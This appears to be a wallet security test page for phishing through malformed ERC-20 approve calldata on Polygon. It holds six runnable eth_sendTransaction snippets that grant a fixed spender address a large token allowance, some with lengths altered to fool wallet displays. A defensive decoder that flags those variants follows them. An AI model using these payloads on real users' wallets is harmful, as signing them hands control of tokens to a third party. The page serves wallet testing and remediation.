PoCs Check

Test Guide

Approve Signature Test Guide

Overview

approve lets a token holder authorize another address to transfer a specified amount of tokens out of the holder's account. It is commonly used to let an exchange or a contract spend tokens held in the user's account.

If the wallet fails to correctly recognize abnormal approve signature data sent by a Dapp, the user is exposed to phishing risk.

Locating the Vulnerability

Click the "Connect Wallet" button on the page to connect your wallet. This test targets the Polygon network. If the blank box below does not show "Polygon Mainnet (Chain ID: 137)" after the wallet is connected, click the "Switch to Polygon Mainnet" button to switch networks.

Click each of the buttons below, such as "approve(address,uint256) 128", to run a test case. Here 128 denotes the normal data length, while "126", "126+Blank" and the others are abnormal lengths. If, after the wallet raises the signing prompt, it fails to correctly identify the signature type or to flag the risk, the vulnerability is present.

Remediation

Wallets should correctly identify the approve signature type regardless of the length of the signature data, and flag approve calldata of abnormal length as a risk instead of presenting it as a routine approval.

// Button "approve(address,uint256) 128": well-formed calldata, 128 hex digits of
// arguments after the 4-byte selector 0x095ea7b3 (address word + uint256 word).
// `accounts` is assumed to hold the result of an earlier eth_requestAccounts call.
ethereum.request({
    "method": "eth_sendTransaction",
    "params": [{
        "from": accounts[0],
        "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
        "gasPrice": "0x09184e72a000",
        "gas": "0xe4f3",
        "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
    }]
});
approve(address,uint256) is: 0x095ea7b3

// Button "126": the amount word is two hex digits (one byte) short, leaving
// 126 hex digits of arguments after the selector 0x095ea7b3.
ethereum.request({
    "method": "eth_sendTransaction",
    "params": [{
        "from": accounts[0],
        "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
        "gasPrice": "0x09184e72a000",
        "gas": "0xe4f3",
        "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
    }]
});

// Blank case: a well-formed 128-digit payload followed by a space and the extra
// characters "112233445566", which is not a valid hex string at all.
ethereum.request({
    "method": "eth_sendTransaction",
    "params": [{
        "from": accounts[0],
        "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
        "gasPrice": "0x09184e72a000",
        "gas": "0xe4f3",
        "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 112233445566"
    }]
});

// Two extra hex digits appended (one trailing byte): 130 hex digits of
// arguments after the selector 0x095ea7b3.
ethereum.request({
    "method": "eth_sendTransaction",
    "params": [{
        "from": accounts[0],
        "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
        "gasPrice": "0x09184e72a000",
        "gas": "0xe4f3",
        "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00"
    }]
});

// One hex digit short: 127 hex digits of arguments after the selector 0x095ea7b3,
// an odd length that cannot even be decoded as a byte string.
ethereum.request({
    "method": "eth_sendTransaction",
    "params": [{
        "from": accounts[0],
        "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
        "gasPrice": "0x09184e72a000",
        "gas": "0xe4f3",
        "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
    }]
});

// One hex digit extra: 129 hex digits of arguments after the selector 0x095ea7b3,
// again an odd length.
ethereum.request({
    "method": "eth_sendTransaction",
    "params": [{
        "from": accounts[0],
        "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
        "gasPrice": "0x09184e72a000",
        "gas": "0xe4f3",
        "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
    }]
});
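The wallet-side check that the remediation asks for, as an added example that is not code from this test page: a strict decoder for approve(address,uint256) calldata that only reports a normal approval when the payload is exactly one address word plus one uint256 word, and classifies every other shape (non-hex characters, odd digit counts, short or long payloads) as malformed so the prompt can show it as a risk. The encoder, the function names and the sample table are this example's own; the samples are constructed to mirror the page's buttons (same spender address and amount, same length defects) rather than copied from them.

```javascript
// Added example (not code from this test page): strict decoding of ERC-20
// approve(address,uint256) calldata, the check a wallet should run before it
// renders an approval prompt. Function names are this example's own.

const APPROVE_SELECTOR = "095ea7b3"; // first 4 bytes of keccak256("approve(address,uint256)")
const WORD_HEX = 64;                 // one ABI word is 32 bytes = 64 hex digits
const MAX_UINT256 = (1n << 256n) - 1n;

// ABI-encode approve(spender, amount) exactly as a well-formed dapp would.
function encodeApprove(spender, amount) {
  const addr = spender.toLowerCase().replace(/^0x/, "");
  if (!/^[0-9a-f]{40}$/.test(addr)) throw new Error("bad spender address");
  return "0x" + APPROVE_SELECTOR
    + addr.padStart(WORD_HEX, "0")
    + BigInt(amount).toString(16).padStart(WORD_HEX, "0");
}

// Classify a transaction's `data` field. Result shapes:
//   { kind: "approve", spender, amount, unlimited }  well-formed approve
//   { kind: "not-approve", selector }                some other function
//   { kind: "malformed", reason }                    show as a risk, never as a plain approval
function classifyApproveCalldata(data) {
  if (typeof data !== "string" || !data.startsWith("0x")) {
    return { kind: "malformed", reason: "data is not a 0x-prefixed string" };
  }
  const hex = data.slice(2);
  // Anything that is not pure hex (a blank, stray characters) is not calldata.
  if (!/^[0-9a-fA-F]*$/.test(hex)) {
    return { kind: "malformed", reason: "non-hex characters in calldata" };
  }
  // An odd number of hex digits cannot be a byte string at all.
  if (hex.length % 2 !== 0) {
    return { kind: "malformed", reason: `odd hex length (${hex.length} digits)` };
  }
  if (hex.length < 8) {
    return { kind: "malformed", reason: "no function selector" };
  }
  const selector = hex.slice(0, 8).toLowerCase();
  const args = hex.slice(8);
  if (selector !== APPROVE_SELECTOR) {
    return { kind: "not-approve", selector: "0x" + selector };
  }
  // approve takes exactly two 32-byte words. The EVM zero-pads a short payload
  // and ignores trailing bytes, so a lenient decoder would "succeed" on both;
  // a wallet must instead refuse to label such data as a normal approve.
  if (args.length !== 2 * WORD_HEX) {
    return { kind: "malformed", reason: `approve needs ${2 * WORD_HEX} hex digits of arguments, got ${args.length}` };
  }
  const addrWord = args.slice(0, WORD_HEX);
  const amountWord = args.slice(WORD_HEX);
  // The 12 padding bytes in front of the address must be zero.
  if (!/^0{24}/.test(addrWord)) {
    return { kind: "malformed", reason: "address word has non-zero padding" };
  }
  const amount = BigInt("0x" + amountWord);
  return {
    kind: "approve",
    spender: "0x" + addrWord.slice(24).toLowerCase(),
    amount,
    unlimited: amount === MAX_UINT256,
  };
}

// Constructed samples mirroring the page's buttons: the same spender and
// amount (2^128 - 1) as the snippets above, with the same length defects.
const SPENDER = "0x9197ee309722a7658934796f0c4bfde85774dd28";
const NORMAL = encodeApprove(SPENDER, (1n << 128n) - 1n); // "128": well-formed
const SAMPLES = {
  normal128: NORMAL,
  short126: NORMAL.slice(0, -2),      // amount word one byte short
  blank: NORMAL + " 112233445566",    // blank plus extra characters appended
  long130: NORMAL + "00",             // one extra trailing byte
  odd127: NORMAL.slice(0, -1),        // odd number of hex digits
  odd129: NORMAL + "F",               // odd number of hex digits
};

// Classify every sample; only normal128 should come back as "approve".
function checkSamples() {
  const out = {};
  for (const [name, data] of Object.entries(SAMPLES)) {
    out[name] = classifyApproveCalldata(data).kind;
  }
  return out;
}

console.log(checkSamples());
```

A wallet would apply classifyApproveCalldata to params[0].data of each incoming eth_sendTransaction and render the "approve" result with the decoded spender and amount, while routing any "malformed" result to a warning screen; the important design choice is that length checks happen before any field is decoded, so a truncated or padded payload never reaches the approval template.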